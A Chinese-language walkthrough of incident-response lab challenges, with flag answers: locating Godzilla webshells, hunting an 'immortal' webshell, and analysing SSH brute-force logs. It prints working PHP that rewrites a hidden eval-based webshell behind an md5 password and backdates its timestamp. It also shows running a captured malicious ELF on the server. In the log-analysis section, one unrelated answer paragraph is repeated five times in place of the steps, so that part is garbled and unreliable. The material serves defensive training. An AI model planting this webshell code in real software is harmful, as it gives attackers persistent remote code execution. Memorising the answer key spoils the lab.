玄机应急响应第一章

webshell

靶机账号密码 root xjwebshell1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}2.黑客使用的什么工具的shell github地址的md5 flag{md5}3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx4.黑客免杀马完整路径 md5 flag{md5}

答案

1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}  --  火绒检测  /var/www/html/include/gz.php  2.黑客使用的什么工具的shell github地址的md5 flag{md5} -- 搜索一下gz.php的木马语句，匹配哥斯拉木马  md5('https://github.com/BeichenDream/Godzilla')3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx  -- 火绒检测   md5('/var/www/html/include/Db/.Mysqli.php')4.黑客免杀马完整路径 md5 flag{md5} -- 火绒检测   md5('/var/www/html/wap/top.php')

Linux入侵排查

账号：root 密码：linuxruqinssh root@IP1.web目录存在木马，请找到木马的密码提交2.服务器疑似存在不死马，请找到不死马的密码提交3.不死马是通过哪个文件生成的，请提交文件名4.黑客留下了木马文件，请找出黑客的服务器ip提交5.黑客留下了木马文件，请找出黑客服务器开启的监端口提交

1.web目录存在木马，请找到木马的密码提交

D盾扫一下

也可以使用命令grep -nr "eval" .发现有1.php、index.php、.shell.php三个文件包含eval字符串

1.php是简单的一句话木马

.shell.php和index.php都是木马且有md5密码校验

答案：flag{1}

2.服务器疑似存在不死马，请找到不死马的密码提交

将md5解密得到hello

答案：flag{hello}

3.不死马是通过哪个文件生成的，请提交文件名

// 引入配置文件include('config.php');// 引入公共函数库include(SYS_ROOT.INC.'common.php');// 获取当前请求的PATH_INFO（URL路径信息）以及查询字符串，并处理成标准格式$path = $_SERVER['PATH_INFO'];$queryString = $_SERVER['QUERY_STRING'];if (!empty($queryString)) {    $path .= '?' . str_replace('?', '', $queryString);}// 如果路径信息以'/'开头，则去掉第一个'/'if (substr($path, 0, 1) == '/') {    $path = substr($path, 1);}// 对路径进行安全过滤或转义（具体实现取决于Base::safeword()方法）$path = Base::safeword($path);// 获取GET参数中的'action'值作为控制器方法，如果没有则默认为'run'$ctrl = isset($_GET['action']) ? $_GET['action'] : 'run';// 检查是否存在'createprocess'这个GET参数，如果存在则调用Index类的createhtml方法生成静态页面if (isset($_GET['createprocess'])) {    Index::createhtml(isset($_GET['id']) ? $_GET['id'] : 0, $_GET['cat'], $_GET['single']);} else {    // 否则调用Index类的run方法处理请求    Index::run($path);}// 创建恶意PHP脚本文件，并写入内容// 当传入的POST参数"pass"经过md5加密后等于特定字符串时，会执行POST参数"cmd"中的PHP代码$file = '/var/www/html/.shell.php';$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';file_put_contents($file, $code);// 修改shell.php文件的修改时间为2021年1月1日0点0分1秒，用于规避一些基于时间的检测机制system('touch -m -d "2021-01-01 00:00:01" .shell.php');// 暂停程序执行3毫秒usleep(3000);

index.php一直生成.shell.php

答案：flag{index.php}

4.黑客留下了木马文件，请找出黑客的服务器ip提交

答案：flag{10.11.55.21}

5.黑客留下了木马文件，请找出黑客服务器开启的监端口提交

答案：flag{3333}

第四题和第五题有两种方法

方法一：

直接在服务器上运行一下木马文件（真实环境不建议使用）

root@ip-10-0-10-1:/var/www/html# chmod 777 shell(1).elf root@ip-10-0-10-1:/var/www/html# ./shell(1).elf netstat -antlp

方法二：

使用云沙箱进行分析

我这里使用的沙箱是https://www.virustotal.com/（也可以用其他的比如微步、360的）

Linux日志分析

账号root密码linuxrzssh root@IP1.有多少IP在爆破主机ssh的root帐号，如果有多个使用","分割2.ssh爆破成功登陆的IP是多少，如果有多个使用","分割3.爆破用户名字典是什么？如果有多个使用","分割4.登陆成功的IP共爆破了多少次5.黑客登陆主机后新建了一个后门用户，用户名是多少

1.有多少IP在爆破主机ssh的root帐号，如果有多个使用","分割小到大排序例如flag{192.168.200.1,192.168.200.2}

cat /var/log/auth.log.1 | grep -a "Failed password for root" | awk '{print $11}' | sort | uniq -c | sort -nr | more

grep -a "Failed password for root" auth.log.1| awk '{print $11}' | sort | uniq -c

答案：flag{192.168.200.2,192.168.200.32,192.168.200.31}（这个flag IP地址有先后顺序试了好几次才试出来）

2.ssh爆破成功登陆的IP是多少，如果有多个使用","分割

查找一下accepted即可

linux命令

cat /var/log/auth.log.1 | grep -a "Accepted " | awk '{print $11}' | sort | uniq -c | sort -nr | more

grep -a "Accepted password" auth.log.1| awk '{print $11}' | sort | uniq -c

答案：flag{192.168.200.2}

3.爆破用户名字典是什么？如果有多个使用","分割

1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}  --  火绒检测  /var/www/html/include/gz.php  2.黑客使用的什么工具的shell github地址的md5 flag{md5} -- 搜索一下gz.php的木马语句，匹配哥斯拉木马  md5('https://github.com/BeichenDream/Godzilla')3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx  -- 火绒检测   md5('/var/www/html/include/Db/.Mysqli.php')4.黑客免杀马完整路径 md5 flag{md5} -- 火绒检测   md5('/var/www/html/wap/top.php')0

1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}  --  火绒检测  /var/www/html/include/gz.php  2.黑客使用的什么工具的shell github地址的md5 flag{md5} -- 搜索一下gz.php的木马语句，匹配哥斯拉木马  md5('https://github.com/BeichenDream/Godzilla')3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx  -- 火绒检测   md5('/var/www/html/include/Db/.Mysqli.php')4.黑客免杀马完整路径 md5 flag{md5} -- 火绒检测   md5('/var/www/html/wap/top.php')1

这个题做的时候忘截图的直接复制的官方的wp

答案：flag{user,hello,root,test3,test2,test1}

4.登陆成功的IP共爆破了多少次

筛选一下ip，筛选一下用户

1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}  --  火绒检测  /var/www/html/include/gz.php  2.黑客使用的什么工具的shell github地址的md5 flag{md5} -- 搜索一下gz.php的木马语句，匹配哥斯拉木马  md5('https://github.com/BeichenDream/Godzilla')3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx  -- 火绒检测   md5('/var/www/html/include/Db/.Mysqli.php')4.黑客免杀马完整路径 md5 flag{md5} -- 火绒检测   md5('/var/www/html/wap/top.php')2

也可以使用问题1的命令

答案：flag{4}**

5.黑客登录主机后新建了一个后门用户，用户名是多少

1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}  --  火绒检测  /var/www/html/include/gz.php  2.黑客使用的什么工具的shell github地址的md5 flag{md5} -- 搜索一下gz.php的木马语句，匹配哥斯拉木马  md5('https://github.com/BeichenDream/Godzilla')3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx  -- 火绒检测   md5('/var/www/html/include/Db/.Mysqli.php')4.黑客免杀马完整路径 md5 flag{md5} -- 火绒检测   md5('/var/www/html/wap/top.php')3

其实看passwd也可以

1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}  --  火绒检测  /var/www/html/include/gz.php  2.黑客使用的什么工具的shell github地址的md5 flag{md5} -- 搜索一下gz.php的木马语句，匹配哥斯拉木马  md5('https://github.com/BeichenDream/Godzilla')3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx  -- 火绒检测   md5('/var/www/html/include/Db/.Mysqli.php')4.黑客免杀马完整路径 md5 flag{md5} -- 火绒检测   md5('/var/www/html/wap/top.php')4